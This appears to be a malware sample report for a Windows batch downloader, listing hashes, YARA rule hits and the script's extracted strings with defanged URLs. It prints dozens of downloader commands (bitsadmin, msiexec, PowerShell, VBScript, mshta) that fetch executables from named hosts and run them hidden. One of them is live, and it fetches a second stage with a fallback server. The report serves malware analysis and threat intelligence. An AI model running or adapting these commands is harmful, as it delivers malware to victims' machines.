Sample details: 1cff7065348059660c3156713cd28cfe

Hashes
MD5: 1cff7065348059660c3156713cd28cfe
SHA1: e2c15edfe99621250acc2303c7811f97b3670bd6
SHA256: fe6944761a9f67ebbd15fa3678a5dd21bbea5cdf0df465e7d961ca42a5b70b20
SSDEEP: 96:Amd/eSysNhUA9eicEfd/3ME++4+Dn+T+NXVM+i+FRfD53:AmdWQl9eeKEGsn2YX+3yfF3
Details
File Type: ASCII
Yara Hits
YRP/powershell | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/System_Tools | YRP/Browsers | YRP/Antivirus | YRP/Dropper_Strings | YRP/Misc_Suspicious_Strings | YRP/GEN_PowerShell | FlorianRoth/PowerShell_Susp_Parameter_Combo
Strings (Windows batch script; URLs defanged as hxxp). Note that all but one of the lines below carry a leading REM and therefore never execute — they appear to be a retained catalogue of earlier downloader variants (iexplore, bitsadmin, msiexec, PowerShell WebClient, VBScript, mshta). The only live command is the un-commented `cmd /c powershell ...` entry: it writes a second-stage .bat into %tmp%, launches it with -windowstyle hidden, and that stage fetches korestros.ri from nrrgarment.com with oasis-projects.com as the fallback, saving it as %tmp%\jnsbolhpqghuu.exe and starting it. Treat the commented lines as historical indicators, not as the behaviour of this sample.
		REM IExplorer
REM cmd.exe /c "C:\Program Files (x86)\Internet Explorer\iexplore.exe" hxxp://example.com/
REM cmd.exe /c "C:\Program Files (x86)\Internet Explorer\iexplore.exe" hxxp://winwin-internatlonal.net/micking.exe 
REM Bitsadmin
REM cmd /c bitsadmin /transfer 8 /download hxxp://uwand.biz/wordpress/wp-admin/user/gm1.exe %temp%\Tf.exe&%temp%\gm1.exe
REM cmd.exe /c bitsadmin /transfer LR /priority foreground hxxp://internationalcon.com/assets/fonts/cpanel/slm.exe %USERPROFILE%\Rb.exe && start %USERPROFILE%\Rb.exe
REM cmd.exe /C bitsadmin /transfer NJukfvQyasbniCMxCYuuQhIMN /download hxxp://ahij.biz/Payment.exe %temp%\Name.exe && start %temp%\Name.exe
REM cmd.exe /c bitsadmin /transfer vd /priority foreground hxxp://185.227.83.56:4560/preest.exe %USERPROFILE%\D.exe && start %USERPROFILE%\D.exe, 0
REM cmd.exe /c bitsadmin /transfer xJ /priority foreground hxxp://185.227.83.56:4560/hop.exe %USERPROFILE%\xgQ.exe && start %USERPROFILE%\xgQ.exe
REM cmd.exe /c bitsadmin.exe /transfer b /download /priority high hxxps://tknk.io/ozBd C:\ProgramData\ZPYzOv.exe & powershell.exe Start-Process C:\ProgramData\ZPYzOv.exe
REM CMD.EXE /c @echo Set objShell = CreateObject("Wscript.Shell") > Rc.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download hxxp://service-id-63545645.co/PaymentAdvice.exe %temp%\Rc.exe&%temp%\Rc.exe",0,True >> Rc.vbs& Rc.vbs
REM cmd.exe /c bitsadmin /transfer CR /priority foreground hxxp://185.148.241.52:4560/cum.exe %USERPROFILE%\WQ.exe && start %USERPROFILE%\WQ.exe
REM misiexec.exe
REM cmd.exe & /C CD C: & msiexec.exe /i hxxp://www.girrajwadi.com/css/aksu.msi /quiet 
REM "C:\Windows\System32\msiexec.exe" /i hxxp://2toporaru.432.com1.ru/shadeslim.msi /quiet
REM "C:\Windows\System32\cmd.exe" C:\Windows\System32\msiexec.exe /i hxxp://profirst.com.vn/ta/build_output8b1683f.msi /quiet , 0
REM Powershell
REM powershell.exe -ep Bypass (New-Object System.Net.WebClient).DownloadFile('hxxp://chembay.co.in/BO.exe', 'C:\ProgramData\WAygONw.exe'); Start-Process('C:\ProgramData\WAygONw.exe')
REM powershell $a = $env:temp + '\eZRVomZtL.exe';WGet 'hxxp://10-a.odessa.one/xx/server.exe' -outFiLe $a;start $a
REM "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('hxxp://infothir.myhostpoint.ch/cab/mon.exe','C:\Users\admin\AppData\Local\Temp/excell.exe'); C:\Users\admin\AppData\Local\Temp/excell.exe
REM powershell "function nghjjq([string] $wlolqrp){(new-object system.net.webclient).downloadfile($wlolqrp,'C:\Users\admin\AppData\Local\Temp\ilmhx.exe');start-process 'C:\Users\admin\AppData\Local\Temp\ilmhx.exe';}try{nghjjq('hxxp://whitakerfamily.info/ico.ico')}catch{nghjjq('hxxp://rayanat.com/ico.ico')}
REM cmd /c powershell "'powershell ""function uxhtsvt([string] $etbove){(new-object system.net.webclient).downloadfile($etbove,''%tmp%\ymhjki.exe'');start-process ''%tmp%\ymhjki.exe'';}try{uxhtsvt(''hxxp://nrrgarment.com/flomtas.bin'')}catch{uxhtsvt(''hxxp://oasis-projects.com/flomtas.bin'')}'"" | out-file -encoding ascii -filepath %tmp%\sjlqwc.bat; start-process '%tmp%\sjlqwc.bat' -windowstyle hidden"
REM cmd /c powershell "'powershell ""function nghjjq([string] $wlolqrp){(new-object system.net.webclient).downloadfile($wlolqrp,''%tmp%\ilmhx.exe'');start-process ''%tmp%\ilmhx.exe'';}try{nghjjq(''hxxp://whitakerfamily.info/ico.ico'')}catch{nghjjq(''hxxp://rayanat.com/ico.ico'')}'"" | out-file -encoding ascii -filepath %tmp%\iorrwf.bat; start-process '%tmp%\iorrwf.bat' -windowstyle hidden"
REM cmd /c powershell "'powershell ""function nohhtasu([string] $bkvtjxvb){(new-object system.net.webclient).downloadfile($bkvtjxvb,''%tmp%\jnsbolhpq.exe'');start-process ''%tmp%\jnsbolhpq.exe'';}try{nohhtasu(''hxxp://lidsandjars.com/room.plo'')}catch{nohhtasu(''hxxp://velsun.in/room.plo'')}'"" | out-file -encoding ascii -filepath %tmp%\huuoy.bat; start-process '%tmp%\huuoy.bat' -windowstyle hidden"
REM cmd /c powershell "'powershell ""function nohhtasu([string] $bkvtjxvb){(new-object system.net.webclient).downloadfile($bkvtjxvb,''%tmp%\jnsbolhpqg.exe'');start-process ''%tmp%\jnsbolhpqg.exe'';}try{nohhtasu(''hxxp://myparamounthealthcare.com/bam.jop'')}catch{nohhtasu(''hxxp://logiviatech.com/bam.jop'')}'"" | out-file -encoding ascii -filepath %tmp%\uuoyw.bat; start-process '%tmp%\uuoyw.bat' -windowstyle hidden"
REM powershell.exe -NoP -NonI -W Hidden -Exec Bypass $down = New-Object System.Net.WebClient;$url = 'hxxps://a.coka.la/R1QGHZ.jpg';.$enV:temP\fttHtawYBACfZvy.exe. ; $down.DownloadFile($url,.$enV:temP\fttHtawYBACfZvy.exe. ); $exec = New-Object -com shell.application; $exec.shellexecute(.$enV:temP\fttHtawYBACfZvy.exe. ); exit;"
REM cmd /c powershell "'powershell ""function nohhtasu([string] $bkvtjxvb){(new-object system.net.webclient).downloadfile($bkvtjxvb,''%tmp%\jnsbolhpqg.exe'');start-process ''%tmp%\jnsbolhpqg.exe'';}try{nohhtasu(''hxxp://myparamounthealthcare.com/bam.jop'')}catch{nohhtasu(''hxxp://logiviatech.com/bam.jop'')}'"" | out-file -encoding ascii -filepath %tmp%\uuoyw.bat; start-process '%tmp%\uuoyw.bat' -windowstyle hidden"
cmd /c powershell "'powershell ""function nohhtasurb([string] $vtjxvb){(new-object system.net.webclient).downloadfile($vtjxvb,''%tmp%\jnsbolhpqghuu.exe'');start-process ''%tmp%\jnsbolhpqghuu.exe'';}try{nohhtasurb(''hxxp://nrrgarment.com/korestros.ri'')}catch{nohhtasurb(''hxxp://oasis-projects.com/korestros.ri'')}'"" | out-file -encoding ascii -filepath %tmp%\ywfrygndy.bat; start-process '%tmp%\ywfrygndy.bat' -windowstyle hidden"
REM VBscript
REM CMD.EXE /c @echo Set objShell = CreateObject("Wscript.Shell") > Fz.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download hxxp://www.mva.by/tags/swiftdetail.exe %temp%\Fz.exe&%temp%\Fz.exe",0,True >> Fz.vbs& Fz.vbs
REM CMD.EXE /c @echo Set objShell = CreateObject("Wscript.Shell") > Mj.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download hxxp://vpstinydev.gq/hot22.exe %temp%\Mj.exe&%temp%\Mj.exe",0,True >> Mj.vbs& Mj.vbs
REM MSHTA
REM "C:\Windows\System32\mshta.exe" hxxp://aitelong.top/amadi/bukkyhta.hta
REM command.exe